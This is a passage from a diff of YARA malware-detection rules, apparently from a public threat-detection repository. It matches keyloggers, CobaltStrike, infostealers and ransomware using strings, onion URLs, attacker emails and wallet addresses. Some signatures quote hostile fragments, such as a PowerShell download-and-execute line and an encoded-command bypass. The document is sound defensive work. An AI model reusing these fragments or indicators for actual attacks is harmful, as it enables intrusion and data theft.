"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAt9uYkHzaizNXg/S11ncTTLybkMtqrKW8gg6TyzbGWnRNROl9O+l1VZBLG0xiMt1mZbuStl8Lt3l1vlkMa92kgLjN+UfKmq3KhBEheN2uMmR0WpwV83kceVRmzr5lug4RyQ/xA6/OXK4NptDIT4L6CUTBWMyk2mmY0Cq9HyyrjdnHeAXWAcQGFEac7W4jTjONZqI+lgScPewS+cPFnz1hAD0IAqzj5X2mZVSfFGR3tDoIe42jw5wb6W2yi8zb3mgKrGtTBbw0Ppj0UgKrmdN5iFmfUQHLEzKAakDggLcBtrW1o5+4WMaZOLw8maU5byvjXu3F3i3GdQe8SKTYcVK5OQIDAQAB" ascii wide + $pk8 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAugqZ4ATE9+9FqununW/DBvGosnUX/bNxQzMYUmE14GJIbNa6vwYSNXOlG09mvdAqZqD3lXihWDjy25+gzqSeS+Fs2qNyTdfGPA8iu2xx5RRUXKLGFThxtIzg3fohAK3+LxJVhxtuITAT38IHacc7dVLHsrddu4UDjiHGFdvXjB55Nwe5cu1BYylHsARMYycBA2FwLP57cKvc2/C3OXBAF6qbsVXBcyFhrKOOYA/+5IjFfEhgHy2FLHRf8lmPQPbSlrM6dk+W4D5KVqOPx/eFp0geUJJlmlre3flI29qWS20bkGqAEz9j07y69HGYN9Nt7+DRgBwrpNo/EkZkuaSTtQIDAQAB" ascii wide + $pk9 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuuAQlnowSGaSi2XgnwaHQAFZ6e7C0SwpAyyLTncJ4l5cwFbM+mwnV+iV3a+ert8WqOmW1aKOCjTPXrXNoirQgboVpLfhIIT1uOOss4O8lodRxgB6QrLCI7PYMZ+8VgIdEPPzsjmTFLxFc7DERxnSjhGdRQIjZNjm7bGScJD0MayDL9KTkVdJtC+C9n5dwEwg6XtQbwLDeaGZaByOgB/zR6tlcPQCNU9rj1qfcVrI/dFW4br/NnJbqrH714z+dvCa18IJTcu3kW74CAilvHrl5qFDd8CCQhjLrjQDPxAoCba9aXKr6dwt34/MU0tVRTYjzMAxR4yTh3oEjVT+HifvVwIDAQAB" ascii wide + $pk10 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwcPjnPl8bI1A0iudX70FKkTjnLjHyetHN2kAIcyOG10K8vm67n/Ma9mAnoDggD3D6UtAbwjvHwPW1m9WF+MrnBXmBizE0JpwOLtVFcHeVLJXlYn/C5RNZziTCwjauH6TlT7Mo/oHfg7nX4IXEuaeAZz8g9ioeJ1Lydi9ZZM1gmdNk8KuKR0zrrJ6MMAGrhMtblLFVwtMn7IlNjT/BgSL4pDyNa++wI5P4R2rMykJwGu/7o2kKE2IFimtFDyZ5a+CX46cdKt7uo5eKFiqf/jTes9/y5AgoS69mt4fRvWFhP7qHXRO2gG8XAc+9suhiuVUWZTAu3xXz5VsmBtk8pzcpwIDAQAB" ascii wide + $pk11 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwMQXFMtYf60KrbUVwNVoPhhrCTNMY3Zv+/WULZRZfJ4dMhYozDxtRVdtBDKtuYuHCGLu/Ymf9wKFFXgVH3En7qI1sU2UdjNR4086X8oSTMUn/GwEAEIZAHtSFuk6AXcXW+eO0yxPF+lt5AZcNnJocWBVZ8RWGvsQdtGgtZalttAynROC4RUGkvD1h1ssMteHWneFLpfzSPGlbu0s0cemsrTPmhexGIenup/YjNdmhbfvvYE9kZfPebGtZHw6oQXWcG7sAlvkGciJl3Eo9FznNj0K+v8WQW5L/UbosZaYVJbxlbtySvqUqZbkLKsmp91tr9bvTiDMZuXZS7iHVqchUQIDAQAB" ascii wide + $pk12 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxbKVxwYe4PpnPm0XtuqShDqFWCFRBw0tYo2vmLwVPlwa+0+ox8+nF0mzWC3ZZT2XkGSodszosOoocfKAwOjQnA+4/Hokl4hgG6K8O7wWuWlvgo4fkcZShy2cMY9FaC6e4bMfurlDFt7OVrKKWAyEGv49Etq6LNoyl5ddM/XmspG52gscRoIcOTwBL4bD8nVcamZXqE4j2mS62HicQ6q9YgRVs1PLbgVPbg8c2rFzpN1e8wZdPtvyGON0m3CmxsYa63yianbnBAS4WnxEnoI7eCZZNkblr+kZB4J9War5VYHu9lFw4XWeuHget/Rn8oGCJOMHkZMz23NpUVaX9htQAwIDAQAB" ascii wide + $url1 = "://zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide + $url2 = "://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion" ascii wide + $url3 = "://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion" ascii wide + $url4 = "://aoczppoxmfqqthtwlwi4fmzlrv6aor3isn6ffaiic55wrfumxslx3vyd.onion" ascii wide + $url5 = "://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion" ascii wide + $url6 = "://b6v4ojs7jfvftvcoagjxp7qz33yeljydqy6afzsh26vqbzcjwz4b3zad.onion" ascii wide + $url7 = "://htnpafzbvddr2llstwbjouupddflqm7y7cr7tcchbeo6rmxpqoxcbqqd.onion" ascii wide + $url8 = "://id7seexjn4bojn5rvo4lwcjgufjz7gkisaidckaux3uvjc7l7xrsiqad.onion" ascii wide + $url9 = "://mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide + $url10 = "://odf3dt34tkqndw5h2l5gt2gwwd3jct5rwwjusbd3vlin2jueyv2qkgid.onion" ascii wide + $url11 = "://rfosusl6qdm4zhoqbqnjxaloprld2qz35u77h4aap46rhwkouejsooqd.onion" ascii wide + $url12 = "://sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd.onion" ascii wide + $url13 = "://xqoykemmcivwtpxh3a6pu3w7sstr2y7hapxdiv4caaxidurmwwbjx2id.onion" ascii wide + $url14 = "://y4722ss64vel5hmph75te7lx2x5xz463322ypjirm5ytxviijtdpybid.onion" ascii wide condition: - uint16(0)==0x5a4d and ($id or 4 of ($s*) or ($pdb and 2 of them )) + (1 of ($pk*) and 1 of ($url*)) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Iamthekingkeylogger : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Koxic { meta: - description = "IAmTheKing Keylogger payload" - author = "ditekSHen" - id = "f9c84241-6db2-5243-9bea-2165104cb0c3" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with LokiLocker ransomware" + author = "ditekShen" + id = "4c4ff722-cac1-5967-9e79-681f47566e96" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1790-L1805" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "80d8cabfd02cd73e19e6cf1c2a8a5f06c5b3b502fe4f07289e92b448425aaa6d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L571-L580" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "ca4d0e85cf4c7a134609262e21d5cef98100ba0a046d17ffe51bf3975dc7cae9" score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.IAmTheKingKeylogger" + quality = 73 + tags = "" strings: - $s1 = "[TIME:]%d/%d/%d %02d:%02d:%02d" fullword ascii - $s2 = "[TITLE:]" fullword ascii - $s3 = "%s-%02d-%02d-%02d-%02d" fullword ascii - $s4 = "[DATA]:" fullword ascii - $s5 = "[BK]" fullword ascii - $s6 = "Log.txt" fullword ascii - $s7 = "sonme hting is wrong x" fullword ascii + $s1 = "wilhelmkox@tutanota.com" ascii wide nocase + $s2 = "F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F" ascii wide condition: - uint16(0)==0x5a4d and 5 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Iamthekingscrcap : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryuk { meta: - description = "IAmTheKing screen capture payload" - author = "ditekSHen" - id = "ba385194-9578-568c-b908-bc4fc742e52e" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Ryuk ransomware" + author = "ditekShen" + id = "00cf99da-ff3c-5c91-8966-69a8afc8613a" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1807-L1821" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "594ddad4e08bad51f90de1c4299e28b4800b4fa686bd4176e406ba401a1242ba" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L582-L592" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a2b6106fc49dd254ca936e285fa0c2a3aee7110832686638d20d369d77f6c48f" score = 75 - quality = 75 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "@MyScreen.jpg" fullword wide - $s2 = "DISPLAY" fullword wide - $s3 = ".?AVCImage@ATL@@" fullword ascii - $s4 = ".?AVGdiplusBase@Gdiplus@@" fullword ascii - $s5 = ".?AVImage@Gdiplus@@" fullword ascii - $s6 = ".?AVBitmap@Gdiplus@@" fullword ascii - $s7 = ".?AVCAtlException@ATL@@" fullword ascii + $s1 = "WayneEvenson@protonmail.com" ascii wide nocase + $s2 = "WayneEvenson@tutanota.com" ascii wide nocase + $s3 = "14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk" ascii wide condition: - uint16(0)==0x5a4d and all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Iamthekingkingofhearts : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockdown { meta: - description = "IAmTheKing King Of Hearts payload" - author = "ditekSHen" - id = "95c73ec0-75b0-5d46-87da-b30feb170716" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with LockDown / cantopen ransomware" + author = "ditekShen" + id = "603f0113-d77b-590c-b2a0-804c6d1fbfbc" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1823-L1843" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "75b6dd0ebb90fd04f9e4a0b1fc6a1bbf417fc66daad24c8b01f0390f6155ec55" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L594-L603" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cb17bb92d6e8189a08508481b75d301a1227906815c684753859914d77d7b3e7" score = 75 - quality = 75 - tags = "FILE" + quality = 73 + tags = "" strings: - $s1 = "write info fail!!! GetLastError-->%u" fullword ascii - $s2 = "LookupAccountSid Error %u" fullword ascii - $s3 = "CreateServiceErrorID:%d" fullword ascii - $s4 = "In ControlServiceErrorID:%d" fullword ascii - $s5 = "In QueryServiceStatus ErrorID:%d" fullword ascii - $s6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" fullword ascii - $s7 = "hello%s" fullword ascii - $s8 = "additional header failed..." fullword ascii - $s9 = "Set Option failed errcode: %ld" fullword ascii - $s10 = "add cookie failed..." fullword ascii - $u1 = "Mozilla/4.0 (compatible; )" fullword ascii - $u2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)" fullword ascii + $s1 = "CCWhite@onionmail.org" ascii wide nocase + $s2 = "bc1q6ug0vrxz66d564qznclu9yyyvn6zurskezmt64" ascii wide condition: - uint16(0)==0x5a4d and ((1 of ($u*) and 4 of ($s*)) or ( all of ($u*) and 3 of ($s*)) or (5 of them )) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Cobaltstrike : FILE +rule DITEKSHEN_INDICATOR_KB_LNK_BOI_MAC : FILE { meta: - description = "CobaltStrike payload" + description = "Detects Windows Shortcut .lnk files with previously known bad Birth Object ID and MAC address combination" author = "ditekSHen" - id = "140e16d0-0102-5650-a371-c95013d7f021" - date = "2024-09-06" - modified = "2024-09-06" + id = "bfef07dc-a368-5119-82dd-de2096b17dd1" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1845-L1864" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "43513aef0ed715f0c214d7a14e465350f9c1bcadf87535e1c12561e976398bb3" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L605-L637" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "31a7966a0ea0fca363d2b926b06c8acbdae0c24dd2156389196255dbbf4ed662" score = 75 - quality = 50 + quality = 73 tags = "FILE" strings: - $s1 = "%%IMPORT%%" fullword ascii - $s2 = "www6.%x%x.%s" fullword ascii - $s3 = "cdn.%x%x.%s" fullword ascii - $s4 = "api.%x%x.%s" fullword ascii - $s5 = "%s (admin)" fullword ascii - $s6 = "could not spawn %s: %d" fullword ascii - $s7 = "Could not kill %d: %d" fullword ascii - $s8 = "Could not connect to pipe (%s): %d" fullword ascii - $s9 = /%s\.\d[(%08x).]+\.%x%x\.%s/ ascii - $pwsh1 = "IEX (New-Object Net.Webclient).DownloadString('http" ascii - $pwsh2 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" fullword ascii + $boi1 = { 2C ED AC EC 94 7A E8 11 9F DE 00 0C 29 A1 A9 40 } + $boi2 = { 3F 54 89 18 46 CB E8 11 BD 0E 08 00 27 6D D5 D9 } + $boi3 = { DE 63 02 FE 57 A2 E8 11 92 E8 5C F3 70 8B 16 F2 } + $boi4 = { C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A } + $boi5 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D } + $boi6 = { E4 51 EC 20 66 61 EA 11 85 CD B2 FC 36 31 EE 21 } + $boi7 = { 6E DD CE 86 0F 07 90 4B AF 18 38 2F 97 FB 53 62 } + $boi8 = { 25 41 87 AE F1 D2 EA 11 93 97 00 50 56 C0 00 08 } + $boi9 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D } + $boi10 = { 5C 46 EC 05 A6 60 EB 11 85 EB 8C 16 45 31 19 7F } + $boi11 = { 30 8B 17 86 9B 35 C5 40 A7 9D 48 5C D6 3D F3 5C } + $boi12 = { E5 21 1D 04 9D A4 E9 11 A9 37 00 0C 29 0F 29 89 } + $boi13 = { 34 5F AC 8A 4E CE ED 4D 8E 55 83 8E EA 24 B3 4E } + $boi14 = { 49 77 25 3B D6 E1 EB 11 9C BB 00 D8 61 85 FD 9F } + $mac1 = { 00 0C 29 A1 A9 40 } + $mac2 = { 08 00 27 6D D5 D9 } + $mac3 = { 5C F3 70 8B 16 F2 } + $mac4 = { 00 0C 29 5A 39 04 } + $mac5 = { B2 FC 36 31 EE 21 } + $mac6 = { 00 50 56 C0 00 08 } + $mac7 = { 8C 16 45 31 19 7F } + $mac8 = { 00 0C 29 0F 29 89 } + $mac9 = { 00 D8 61 85 FD 9F } condition: - uint16(0)==0x5a4d and (5 of ($s*) or ( all of ($pwsh*) and 2 of ($s*)) or (#s9>6 and 4 of them )) + uint16(0)==0x004c and uint32(4)==0x00021401 and filesize <3KB and (1 of ($boi*) and 1 of ($mac*)) } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Redlinedropperahk : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Powershellwifistealer { meta: - description = "Detects AutoIt/AutoHotKey executables dropping RedLine infostealer" - author = "ditekSHen" - id = "16eee826-f1fd-5a6f-b6f3-e02ccd889614" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects email accounts used for exfiltration observed in PowerShellWiFiStealer" + author = "ditekShen" + id = "fa19e422-c682-5464-b034-330942daf3bd" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1866-L1878" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "0950fe9daa02f3a8fd527f75275766111be7e8774578963b0bdb455800dfc4f9" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L691-L704" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f119b54032e2a6ca35819e811e6479b00936115d98ef6e928f4c819d04a8321f" score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.RedLineDropper-AHK" + quality = 63 + tags = "" strings: - $s1 = ".SetRequestHeader(\"User-Agent\",\" ( \" OSName \" | \" bit \" | \" CPUNAme \"\"" ascii - $s2 = ":= \" | Windows Defender\"" ascii - $s3 = "WindowSpy.ahk" wide - $s4 = ">AUTOHOTKEY SCRIPT<" fullword wide + $s1 = "hajdebebreidekreide@gmail.com" ascii wide nocase + $s2 = "usb@pterobot.net" ascii wide nocase + $s3 = "umairdadaber@gmail.com" ascii wide nocase + $s4 = "mrumairok@gmail.com" ascii wide nocase + $s5 = "credsenderbot@gmail.com" ascii wide nocase + $s6 = "easywareytb@gmail.com" ascii wide nocase condition: - uint16(0)==0x5a4d and all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Dlagent01 : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Powershellcookiestealer { meta: - description = "Detects known downloader agent" - author = "ditekSHen" - id = "85ead6fd-b56e-5e78-8fb4-7c9ecb4c0b58" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects email accounts used for exfiltration observed in PowerShellCookieStealer" + author = "ditekShen" + id = "c2bbb9a8-3e4c-5676-9676-2708a196ef8d" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1880-L1894" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "7aec81655af9b779a314c3e2cff933aa6426fcfe21b5a87e60e159c7e7f5238a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L706-L715" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bd404e94939acb92dd56a7d2a1f7536bcb3f520ca1e9dc614b53828afbc6dac8" score = 75 - quality = 75 - tags = "FILE" - snort_sid = "920007" - clamav_sig = "MALWARE.Win.Trojan.DLAgent01" + quality = 71 + tags = "" strings: - $s1 = "Mozilla/5.0 Gecko/41.0 Firefox/41.0" fullword wide - $s2 = "/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List" fullword wide - $s3 = "GUID.log" fullword wide - $s4 = "NO AV" fullword wide - $s5 = "%d:%I64d:%I64d:%I64d" fullword wide + $s1 = "senmn0w@gmail.com" ascii wide nocase + $s2 = "mohamed.trabelsi.ena2@gmail.com" ascii wide nocase condition: - uint16(0)==0x5a4d and 4 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Linux_PLEAD : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Zebrocy : FILE { meta: - description = "PLEAD Linux payload" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "07aa0561-d6d9-53b6-97ac-670cdf04335d" - date = "2024-09-06" - modified = "2024-09-06" + id = "fc805e9d-47a0-5fcb-9b21-4806c13ab7b4" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1896-L1920" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "539998248ded0eb8ea1702c527804f89cfd55412f17ec699bd0af801f4fba673" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1541-L1550" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "16b88460896012b42ca576995f5de98a7a9d2fcc53f8e148427bca31a883d19b" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Linux.Trojan.PLEAD" strings: - $x1 = "CFileTransfer" ascii - $x2 = "CFileManager" ascii - $x3 = "CPortForward" ascii - $x4 = "CPortForwardManager" ascii - $x5 = "CRemoteShell" ascii - $x6 = "CSockClient" ascii - $s1 = "/proc/self/exe" fullword ascii - $s2 = "/bin/sh" fullword ascii - $s3 = "echo -e '" ascii - $s4 = "%s <DIR> %s" ascii - $s5 = "%s %lld %s" ascii - $s6 = "Files: %d Size: %lld" ascii - $s7 = "Dirs: %d" ascii - $s8 = "%s(%s)/" ascii - $s9 = "%s %s %s %s" ascii + $s1 = "Go build ID: \"l6RAKXh3Wg1yzn63nita/b2_Y0DGY05NFWuZ_4gUT/H91sCRktnyyYVzECfvvA/l8f-yII0L_miSjIe-VQu\"" ascii + $s2 = "Go build ID: \"fiGGvLVFcvIhuJsSaail/jLt9TEPQiusg7IpRkp4H/hlcoXZIfsl1D4521LqEL/yL8dN86mCNc39WqQTgGn\"" ascii condition: - uint16(0)==0x457f and ( all of ($x*) or all of ($s*) or 12 of them ) + uint16(0)==0x5a4d and filesize <8000KB and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_CRAT : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Gostealer : FILE { meta: - description = "Detects CRAT main DLL" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "9757a8de-61ea-55c0-b64c-055798450985" - date = "2024-09-06" - modified = "2024-09-06" + id = "25c0eb8b-c69c-5f50-b622-daaa3c8c62a4" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1922-L1944" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5a9fef68e110a1564dd5956408abcc3736cfa6853e1ac5510a089cc68f6bdc35" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1552-L1562" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d548bc2580c8e8233a5fcdf85b947547c10f2c4d0056d14e990f30dd7b9a0672" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "cmd /c \"dir %s /s >> %s\"" wide - $s2 = "Set-Cookie:\\b*{.+?}\\n" wide - $s3 = "Location: {[0-9]+}" wide - $s4 = "Content-Disposition: form-data; name=\"%s\"; filename=\"" ascii - $s6 = "%serror.log" wide - $v2x_1 = "?timestamp=%u" wide - $v2x_2 = "config.txt" wide - $v2x_3 = "entdll.dll" wide - $v2x_4 = "\\cmd.exe" wide - $v2x_5 = "[MyDocuments]" wide - $v2x_6 = "@SetWindowTextW FindFileExA" wide - $v2x_7 = "Microsoft\\Windows\\WinX\\Group1\\*.exe" wide - $v2s_1 = "Installed Anti Virus Programs" ascii - $v2s_2 = "Running Processes" ascii - $v2s_3 = "id=%u&content=" ascii + $s1 = "Go build ID: \"xQV-b1Fr7d576TTTpbXi/gq4FgVQqMcg--9tmY13y/76rKNEUBENlDFDcecmm_/mbw17A_6WrROaNCYDEQF\"" ascii + $s2 = "Go build ID: \"x4VqrSSsx8iysxVdfB-z/gIF3p7SUxiZsVgTuq7bN/93XHuILGnGYq2L83fRpj/eoY6nTqwk1sdMHTaXzlw\"" ascii + $s3 = "Go build ID: \"BPRThIYWbHcZQQ4K1y2t/2mO0-FjLC50P0QZuMTgC/9i6TYw_akiEF9ZPN0s3p/s1XoqXr7EyXMDVw5TTP3\"" ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or 6 of ($v2x*) or all of ($v2s*) or (2 of ($v2s*) and 4 of ($v2x*))) + uint16(0)==0x5a4d and filesize <8000KB and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Cratpluginkeylogger : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Goldenaxe : FILE { meta: - description = "Detects CRAT keylogger plugin DLL" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "a8682786-7704-56f0-a6df-b4e2ab4d7536" - date = "2024-09-06" - modified = "2024-09-06" + id = "e734d5b4-2332-5b46-a05e-fb35134ea070" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1946-L1962" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "58ef1f7466fcc871be2e74aa447c76970fd90c9d9d345a896fb8e6335114d189" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1564-L1573" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "4ab9aeaa74530de4a62ddfa8d7e8607e455d0ba4330260037327bec6d8d7abab" score = 75 quality = 75 tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.CRAT" strings: - $ai1 = "VM detected!" fullword wide - $ai2 = "Sandbox detected!" fullword wide - $ai3 = "Debug detected!" fullword wide - $ai4 = "Analysis process detected!" fullword wide - $s1 = "Create KeyLogMutex %s failure %d" wide - $s2 = "Key Log Mutex already created! %s" wide - $s3 = /KeyLogThread\s(started|finished|terminated)!/ wide - $s4 = /KeyLog_(x64|x32|Win64|Win32)_DllRelease\.dll/ fullword ascii + $s1 = "Go build ID: \"BrJuyMRdiZ7pC9Cah0is/rbDB__hXWimivbSGiCLi/B35SPLQwHal3ccR2gXNx/hEmVzhJWWatsrKwnENh_\"" ascii + $s2 = "Go build ID: \"5bgieaBe9PcZCZf23WFp/bCZ0AUHYlqQmX8GJASV6/fGxRLMDDYrTm1jcLMt8j/Wof3n5634bwiwLHFKHTn\"" ascii condition: - uint16(0)==0x5a4d and (( all of ($ai*) and 1 of ($s*)) or (3 of ($s*) and 1 of ($ai*)) or 5 of them ) + uint16(0)==0x5a4d and filesize <8000KB and 1 of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Cratpluginclipboardmonitor : FILE +rule DITEKSHEN_INDICATOR_KB_Gobuildid_Nemty : FILE { meta: - description = "Detects CRAT Clipboad Monitor plugin DLL" + description = "Detects Golang Build IDs in known bad samples" author = "ditekSHen" - id = "587487c7-f00b-5d4a-8b18-e46d6c6560e2" - date = "2024-09-06" - modified = "2024-09-06" + id = "512fe910-e38c-513c-b678-a0592bdc4ae2" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1964-L1979" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c3e692a06388e143a8e1053e75a6eb6a82da5bdf26d38e3a0e339bc20d8312a1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L1575-L1588" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "246766ab1d2871b5c22323f622d39ce9fa9b46a2d43bace122ed5549484f3aac" score = 75 quality = 75 tags = "FILE" strings: - $ai1 = "VM detected!" fullword wide - $ai2 = "Sandbox 